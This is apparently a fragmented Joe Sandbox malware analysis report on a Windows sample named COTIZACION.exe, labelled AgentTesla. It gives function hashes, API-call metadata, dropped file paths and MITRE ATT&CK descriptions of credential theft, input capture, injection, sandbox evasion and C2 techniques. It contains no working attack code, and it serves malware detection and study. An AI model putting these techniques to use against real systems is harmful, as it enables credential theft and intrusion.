Opcode ID: 7fd7157497172c9f318bf98a4fb67287a8229482c769d0760730e91a53415355
Instruction ID: 996783d6cd48fd53c0aa1e0c72f2b2c00c5007ab81492ad72e175c0f4d113d27
Opcode Fuzzy Hash: 7fd7157497172c9f318bf98a4fb67287a8229482c769d0760730e91a53415355
Instruction Fuzzy Hash: E8D05E313500249B4A08B36CA45186A33E99BCE752710057FF81ADB352CE919C06578A

Function 0015E6E8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb86245984f0cd2a05177bfeacf305eb974bff153167f33d8eb0394e9dd29e1a
Instruction ID: 469ca84da699b227380cfcd784553d628c0effb4451f7177cb68d69e73ee99bb
Opcode Fuzzy Hash: eb86245984f0cd2a05177bfeacf305eb974bff153167f33d8eb0394e9dd29e1a
Instruction Fuzzy Hash: 4FD09722D093049FD32E829C69043523BDA6B0C307F49409AE82ECB281E3508E0983C0

Function 0015E6F8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c37866088a592a77aa80da72d2c73072c4dea385fe2f189554cf93dfd540c73
Instruction ID: fa7b6082b25042b39c60e953cc882a08083e02a9e9deb9018b80cb784b02879b
Opcode Fuzzy Hash: 8c37866088a592a77aa80da72d2c73072c4dea385fe2f189554cf93dfd540c73
Instruction Fuzzy Hash: FCD0A734A05714DBC33CDA59D104653B7DAFB4C715B854419E45787A40C7A0FD0587C0

Non-executed Functions

Function 004036DA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F

Strings

UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
NSIS Error, xrefs: 00403840
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6

Memory Dump Source

Source File: 00000005.00000002.2572319962.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2572304070.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572357119.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572472061.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_COTIZACION.jbxd

Similarity

API ID: ErrorModeVersion
String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
API String ID: 3050056751-1170945346
Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 0040618B
%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4

Memory Dump Source

Source File: 00000005.00000002.2572319962.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2572304070.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572357119.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572472061.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_COTIZACION.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

UXTHEME, xrefs: 004068C4, 004068D1, 004068DC
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5

Memory Dump Source

Source File: 00000005.00000002.2572319962.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2572304070.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572357119.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2572472061.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_COTIZACION.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report COTIZACION.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll

C:\Users\user\Music\antithetic.ini

C:\Users\user\overlays\besvangredes\Afbetaltes\regill.ful

C:\Users\user\overlays\besvangredes\Afbetaltes\sortlistningens.txt

C:\Users\user\overlays\besvangredes\Emmens.udk

C:\Users\user\overlays\besvangredes\Loftrums.Aku

C:\Users\user\overlays\besvangredes\Ordner\boyaus.rom

C:\Users\user\overlays\besvangredes\Ordner\gear.dra

C:\Users\user\overlays\besvangredes\Ordner\jagtfalk.ill

C:\Users\user\overlays\besvangredes\Proprietrer.bet

C:\Users\user\overlays\besvangredes\Satsarbejderne.Lam

C:\Users\user\overlays\besvangredes\Trikstanks.pra

Static File Info

General

File Icon

Windows Analysis Report
COTIZACION.exe

Function 004036DA Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 416
stringfilecomCOMMON

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Function 00404F70 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Function 00405A1C Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 225
stringregistryCOMMON

Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441
stringtimesleepCOMMON

Function 004033CB Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178
memoryCOMMON

Function 00405E98 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 00405D18 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 76
stringwindowCOMMON

Function 00403148 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162
COMMON

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00406A34 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35
COMMON

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18
libraryloaderCOMMON

Function 00405E1C Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Function 00406955 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Function 00405DFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12
COMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre